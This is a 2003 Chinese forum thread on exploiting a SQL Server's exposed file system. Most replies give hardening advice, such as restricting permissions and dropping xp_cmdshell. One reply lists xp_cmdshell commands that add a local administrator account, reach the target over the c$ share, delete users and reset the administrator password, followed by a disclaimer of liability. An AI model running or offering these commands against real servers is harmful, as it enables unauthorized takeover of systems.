导航
  • 主页
  • 基础类
  • 应用实例
  • 新技术前沿

怎么样利用sqlserver的漏洞?

smilegw 2003-12-09 11:12:11
不知道大家发现了没有,sqlserver装在服务器上,我们在客户端注册到服务器上,如果要用企业管理器备份服务器上的数据时,便会看到服务器上所有的盘符和所有的文件!!我们怎么能利用这个漏洞对服务器上的文件进行操作呢,比如说考拷贝,或删除呢?
...全文
13 点赞 收藏 7
写回复
7 条回复
切换为时间正序
请发表友善的回复…
发表回复
利用的话,就调用xp_cmdshell.但也要有管理员管理.
回复
w_rose 2003-12-09
谁让你允许任何人都能够有sa/dbo身份的?

大部分人(超过80%),对安全性问题基本上无知无畏。少部分人(超过15%),包括我,只有很少一点知识和经验。其实根本不用“删除xp_cmdshell”或者“过滤用户命令”等临时应付的办法,好好规范每一个访客的操作范围就行了。
回复
w_rose 2003-12-09
谁允许你开发服务器上的磁盘目录访问权限的?
回复
通过权限限制就行了.
回复
lynx1111 2003-12-09
楼上说的只有SA级别权限的才能使用xp_cmdshell
如果你不需要扩展存储过程xp_cmdshell请把它去掉。使用这个SQL语句:
use master
sp_dropextendedproc 'xp_cmdshell'
xp_cmdshell是进入操作系统的最佳捷径,是数据库留给操作系统的一个大后门。如果你需要这个存储过程,请用这个语句也可以恢复过来。
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
回复
Arionma 2003-12-09
这需要管理员权限。
回复
txlicenhe 2003-12-09
http://expert.csdn.net/Expert/topic/2343/2343814.xml?temp=.7005121
本地装个sqlserver,用查询分析器登陆对方后:

exec xp_cmdshell 'net user mm 123 /add' --添加一用户
exec xp_cmdshell 'net localgroup administrators mm /add' --为用户添加管理员权限
再用\\对方机器\c$入侵
最后用 exec xp_cmdshell 'net user admin /delete'把用户给删除掉
改密码:
xp_cmdshell 'net user administrator "123"'


若引起法律责任,概不负责。

回复
发动态
发帖子
MS-SQL Server
创建于2007-09-28

3.2w+

社区成员

MS-SQL Server相关内容讨论专区
申请成为版主
社区公告
暂无公告